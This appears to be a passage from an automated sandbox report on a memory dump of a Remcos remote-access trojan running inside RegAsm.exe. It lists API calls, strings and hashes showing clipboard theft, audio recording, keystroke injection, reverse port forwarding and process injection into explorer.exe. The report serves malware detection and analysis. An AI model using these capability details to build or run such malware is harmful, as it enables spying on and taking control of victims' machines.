              • Opcode Fuzzy Hash: 2eb2f374b938242071c93788593a146c5cd764c3a8e17b9f296123b837d09fc8
              • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
              Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
              • CloseHandle.KERNEL32(00000000), ref: 00417DE5
              • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
              • String ID: 0VG$0VG$<$@$Temp
              • API String ID: 1704390241-2575729100
              • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
              • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
              • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
              • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
              Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
              Download Yara Rule
              APIs
              • OpenClipboard.USER32 ref: 00416941
              • EmptyClipboard.USER32 ref: 0041694F
              • CloseClipboard.USER32 ref: 00416955
              • OpenClipboard.USER32 ref: 0041695C
              • GetClipboardData.USER32 ref: 0041696C
              • GlobalLock.KERNEL32 ref: 00416975
              • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
              • CloseClipboard.USER32 ref: 00416984
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
              • String ID: !D@
              • API String ID: 2172192267-604454484
              • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
              • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
              • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
              • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
              Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
              • GetFileSize.KERNEL32(?,00000000), ref: 00413432
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
              • CloseHandle.KERNEL32(00000000), ref: 0041345F
              • CloseHandle.KERNEL32(?), ref: 00413465
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
              • String ID:
              • API String ID: 297527592-0
              • Opcode ID: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
              • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
              • Opcode Fuzzy Hash: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
              • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
              Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
              Download Yara Rule
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
              • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
              • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
              • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
              Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00448135
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00448141
              • _free.LIBCMT ref: 0044814C
              • _free.LIBCMT ref: 00448157
              • _free.LIBCMT ref: 00448162
              • _free.LIBCMT ref: 0044816D
              • _free.LIBCMT ref: 00448178
              • _free.LIBCMT ref: 00448183
              • _free.LIBCMT ref: 0044818E
              • _free.LIBCMT ref: 0044819C
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
              • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
              • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
              • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
              Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Eventinet_ntoa
              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
              • API String ID: 3578746661-3604713145
              • Opcode ID: f9a27c71ff67ba9158015f4eae185af36ec3b7274dd4ef4f0beb13a76f4cc4c0
              • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
              • Opcode Fuzzy Hash: f9a27c71ff67ba9158015f4eae185af36ec3b7274dd4ef4f0beb13a76f4cc4c0
              • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
              Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: DecodePointer
              • String ID: acos$asin$exp$log$log10$pow$sqrt
              • API String ID: 3527080286-3064271455
              • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
              • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
              • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
              • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
              Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
              Download Yara Rule
              APIs
              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              • Sleep.KERNEL32(00000064), ref: 00417521
              • DeleteFileW.KERNEL32(00000000), ref: 00417555
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CreateDeleteExecuteShellSleep
              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
              • API String ID: 1462127192-2001430897
              • Opcode ID: ec50ac54269d49d44067edab70f48f9f458cf939bf05b3af8c0101079797eb99
              • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
              • Opcode Fuzzy Hash: ec50ac54269d49d44067edab70f48f9f458cf939bf05b3af8c0101079797eb99
              • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
              Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CurrentProcess
              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
              • API String ID: 2050909247-4242073005
              • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
              • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
              • Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
              • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
              Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
              Download Yara Rule
              APIs
              • _strftime.LIBCMT ref: 00401D50
                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
              • API String ID: 3809562944-243156785
              • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
              • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
              • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
              • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
              Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
              Download Yara Rule
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
              • int.LIBCPMT ref: 00410E81
                • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
              • std::_Facet_Register.LIBCPMT ref: 00410EC1
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
              • __Init_thread_footer.LIBCMT ref: 00410F29
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
              • String ID: ,kG$0kG
              • API String ID: 3815856325-2015055088
              • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
              • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
              • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
              • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
              Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
              Download Yara Rule
              APIs
              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
              • waveInStart.WINMM ref: 00401CFE
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
              • String ID: dMG$|MG$PG
              • API String ID: 1356121797-532278878
              • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
              • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
              • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
              • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
              Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
              • TranslateMessage.USER32(?), ref: 0041D4E9
              • DispatchMessageA.USER32 ref: 0041D4F3
              • GetMessageA.USER32 ref: 0041D500
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
              • String ID: Remcos
              • API String ID: 1970332568-165870891
              • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
              • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
              • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
              • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
              Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
              • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
              • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
              • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
              Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • _memcmp.LIBVCRUNTIME ref: 00445423
              • _free.LIBCMT ref: 00445494
              • _free.LIBCMT ref: 004454AD
              • _free.LIBCMT ref: 004454DF
              • _free.LIBCMT ref: 004454E8
              • _free.LIBCMT ref: 004454F4
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorLast$_abort_memcmp
              • String ID: C
              • API String ID: 1679612858-1037565863
              • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
              • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
              • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
              • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
              Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: tcp$udp
              • API String ID: 0-3725065008
              • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
              • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
              • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
              • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
              Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
              Download Yara Rule
              APIs
              • __Init_thread_footer.LIBCMT ref: 004018BE
              • ExitThread.KERNEL32 ref: 004018F6
              • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
              • String ID: PkG$XMG$NG$NG
              • API String ID: 1649129571-3151166067
              • Opcode ID: d792f27428e216ec403bd2c8f2a7274a29a7ee60ee52af981f0ff1553ee06993
              • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
              • Opcode Fuzzy Hash: d792f27428e216ec403bd2c8f2a7274a29a7ee60ee52af981f0ff1553ee06993
              • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
              Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • CloseHandle.KERNEL32(00000000), ref: 00407A4D
              • MoveFileW.KERNEL32 ref: 00407A6A
              • CloseHandle.KERNEL32(00000000), ref: 00407A95
              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
              • String ID: .part
              • API String ID: 1303771098-3499674018
              • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
              • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
              • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
              • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
              Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
              Download Yara Rule
              APIs
              • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
              • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: InputSend
              • String ID:
              • API String ID: 3431551938-0
              • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
              • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
              • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
              • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
              Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: __freea$__alloca_probe_16_free
              • String ID: a/p$am/pm$zD
              • API String ID: 2936374016-2723203690
              • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
              • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
              • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
              • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
              Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Enum$InfoQueryValue
              • String ID: [regsplt]$xUG$TG
              • API String ID: 3554306468-1165877943
              • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
              • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
              • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
              • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
              Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetConsoleCP.KERNEL32 ref: 0044B3FE
              • __fassign.LIBCMT ref: 0044B479
              • __fassign.LIBCMT ref: 0044B494
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
              • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
